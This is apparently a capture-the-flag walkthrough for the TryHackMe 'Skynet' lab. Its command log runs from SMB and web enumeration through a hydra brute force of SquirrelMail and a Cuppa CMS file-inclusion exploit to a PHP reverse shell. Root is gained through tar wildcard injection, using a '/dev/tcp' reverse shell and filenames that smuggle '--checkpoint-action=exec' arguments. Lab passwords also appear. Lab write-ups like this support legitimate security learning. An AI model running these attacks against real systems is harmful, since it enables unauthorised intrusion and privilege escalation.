Skynet

Room Link: https://tryhackme.com/room/skynet

nmap -A 10.10.13.172

smbclient -L //10.10.13.172

smbget -R smb://10.10.13.172/anonymous
cat logs/log* | sort | uniq  > passwords.txt 

There is also an email from Miles Dyson, as it's just his name I tried different varations of his name for a username. There is a folder on samba that could be the username as well, milesdyson.

username.txt

gobuster dir 10.10.13.172 -u http://10.10.13.172 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

hydra -l milesdyson -P passwords.txt 10.10.13.172 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F incorrect" -V -F -u

We can now login to squirrelmail that gobuster discovered.

Downloaded all the files from the milesdyson folder on smb.

smbget -R smb://10.10.13.172/milesdyson -U milesdyson
Password: )s{A&2Z=F^n_E.B`

gobuster dir 10.10.13.172 -u http://10.10.13.172/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

None of the passwords worked or default credentials for cuppa.

Found an exploit for cuppa LFI/RFI

searchsploit cuppa
searchsploit -x php/webapps/25971.txt

Testing LFI and it works

http://10.10.13.172/45kra24zxs28v3yd/administrator//alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Now we will try RFI to get a reverse shell

Kali #1

Create PHP reverse shell then host the file

python2 -m SimpleHTTPServer 81

Kali #2

nc -lvnp 1337

Browser

http://10.10.13.172:81/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.243.233/revshell.php

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

There is a backup script that is ran every minute by root which backs up /var/www/html

Victim

We can use the following from gtfo to create a reverse shell. The checkpoint argument lets us run a command before the files are tar'd so we will create a reverse shell in /var/www/html and then the commands will execute when the folder is tar'd next.

Exploit Link: https://gtfobins.github.io/gtfobins/tar/

printf '#!/bin/bash\nbash -i >& /dev/tcp/10.10.243.233/1338 0>&1' > /var/www/html/shell
chmod +x /var/www/html/shell
touch /var/www/html/--checkpoint=1
touch /var/www/html/--checkpoint-action=exec=bash\ shell

Kali

nc -nvlp 1338

There is a password in the configuration file, it does not work for root but we see in the home directory another user called jjameson

cat /var/www/html/configuration.php

We can login as jjameson

su jjameson
Password: nv5uz9r3ZEDzVjNu